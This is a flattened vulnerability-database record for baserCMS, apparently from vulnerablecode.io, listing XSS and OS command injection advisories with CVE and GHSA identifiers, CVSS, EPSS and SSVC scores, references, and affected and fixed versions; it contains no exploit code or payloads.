url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
11
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in the Edit Email Form Settings feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
12
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in the Blog posts and Contents list features of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
13
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
14
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OS Command Injection (baserCMS update feature).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)

### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
15
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious JavaScript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
Fixing_vulnerabilities
0
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
Risk_score null
Resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1